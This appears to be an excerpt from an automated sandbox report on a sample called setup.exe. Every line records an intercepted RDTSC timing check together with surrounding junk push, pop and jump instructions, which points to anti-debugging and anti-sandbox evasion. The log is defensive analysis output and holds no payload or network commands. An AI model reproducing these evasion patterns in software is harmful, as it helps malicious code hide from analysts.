Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41A377 second address: 41A37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41A4E5 second address: 41A4F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F47D8E48266h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41A4F5 second address: 41A4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41AB34 second address: 41AB44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F47D8E48266h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41B3CC second address: 41B3E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41B998 second address: 41B99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41B99D second address: 41B9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41B9A3 second address: 41B9A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41BC2A second address: 41BC30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41BC30 second address: 41BC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41BC34 second address: 41BC62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F47D8E3B0B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jbe 00007F47D8E3B0A6h 0x00000014 ja 00007F47D8E3B0A6h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41BC62 second address: 41BC68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42011D second address: 420133 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420133 second address: 420142 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420142 second address: 42014D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42014D second address: 420151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420151 second address: 420170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F47D8E3B0B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420170 second address: 420176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420176 second address: 42017C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420538 second address: 42053C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42067F second address: 420685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420685 second address: 42068B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42068B second address: 420690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420690 second address: 420695 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420695 second address: 4206A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4206A0 second address: 4206CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48276h 0x00000009 pop esi 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e push edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edi 0x00000012 jc 00007F47D8E4826Eh 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420837 second address: 42084F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42084F second address: 420854 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420854 second address: 420869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F47D8E3B0ACh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420869 second address: 420886 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E48266h 0x00000008 jc 00007F47D8E48266h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 jns 00007F47D8E48266h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420886 second address: 420890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420890 second address: 4208A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4209D2 second address: 4209D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 420B0A second address: 420B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F47D8E48270h 0x0000000d ja 00007F47D8E48266h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42DC20 second address: 42DC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F47D8E3B0B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42DC3D second address: 42DC46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42BD80 second address: 42BDE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F47D8E3B0ABh 0x0000000a jmp 00007F47D8E3B0B3h 0x0000000f popad 0x00000010 jmp 00007F47D8E3B0B5h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push ecx 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop ecx 0x0000001c je 00007F47D8E3B0BFh 0x00000022 jmp 00007F47D8E3B0B9h 0x00000027 jnc 00007F47D8E3B0AEh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42BF58 second address: 42BF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42C542 second address: 42C557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007F47D8E3B0AEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42C557 second address: 42C573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42C879 second address: 42C87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42C87D second address: 42C885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42CC6A second address: 42CC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007F47D8E3B0AEh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 42D366 second address: 42D36B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 441BF2 second address: 441BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 378650 second address: 378654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4417BA second address: 4417BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4417BF second address: 4417C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 447087 second address: 44708B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 44708B second address: 4470AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48271h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F47D8E48268h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 446D19 second address: 446D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 446D1D second address: 446D42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F47D8E48274h 0x0000000e jg 00007F47D8E48266h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 446D42 second address: 446D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 446D48 second address: 446D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F47D8E48266h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 44D5B2 second address: 44D5BC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47D8E3B0A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 453BDD second address: 453BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 453BE8 second address: 453BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 457668 second address: 457689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 457689 second address: 45768D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 459030 second address: 459036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 45C11F second address: 45C124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 46199C second address: 4619A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4619A2 second address: 4619AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4619AB second address: 4619B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4619B1 second address: 4619B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4619B5 second address: 4619C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F47D8E48266h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4619C1 second address: 4619C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4619C9 second address: 4619CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4619CD second address: 4619D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4619D7 second address: 4619DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4619DD second address: 4619E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 461C69 second address: 461C7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jnc 00007F47D8E48266h 0x0000000d jc 00007F47D8E48266h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 461DD8 second address: 461DFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47D8E3B0B4h 0x0000000d ja 00007F47D8E3B0A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4620DA second address: 462115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 jmp 00007F47D8E4826Fh 0x0000000d pop ecx 0x0000000e push ecx 0x0000000f jp 00007F47D8E48266h 0x00000015 pop ecx 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop ecx 0x0000001c popad 0x0000001d pushad 0x0000001e jne 00007F47D8E48268h 0x00000024 jnc 00007F47D8E48268h 0x0000002a pushad 0x0000002b popad 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 462B69 second address: 462B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 465D07 second address: 465D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 465D12 second address: 465D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 465D18 second address: 465D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 46588D second address: 4658A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F47D8E3B0B1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 46A967 second address: 46A989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a ja 00007F47D8E48266h 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F47D8E4826Ah 0x00000019 push ebx 0x0000001a pushad 0x0000001b popad 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 46A989 second address: 46A990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 46A7FF second address: 46A81C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F47D8E4826Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 46BF46 second address: 46BF4C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 46BF4C second address: 46BF59 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F47D8E48266h 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4762FA second address: 47630C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 47630C second address: 476312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 476312 second address: 47631A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 47631A second address: 476340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48272h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnc 00007F47D8E48266h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 476340 second address: 476346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 476346 second address: 47635A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jl 00007F47D8E48266h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 489018 second address: 48901C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48901C second address: 489020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A20DF second address: 4A20EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A20EC second address: 4A20F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A20F1 second address: 4A210D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c js 00007F47D8E3B0A6h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 36AF20 second address: 36AF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b jo 00007F47D8E4826Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A119A second address: 4A11D9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E3B0C2h 0x00000008 jmp 00007F47D8E3B0B6h 0x0000000d jbe 00007F47D8E3B0A6h 0x00000013 jmp 00007F47D8E3B0B5h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A11D9 second address: 4A11DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A1479 second address: 4A1490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0B1h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A1490 second address: 4A1494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
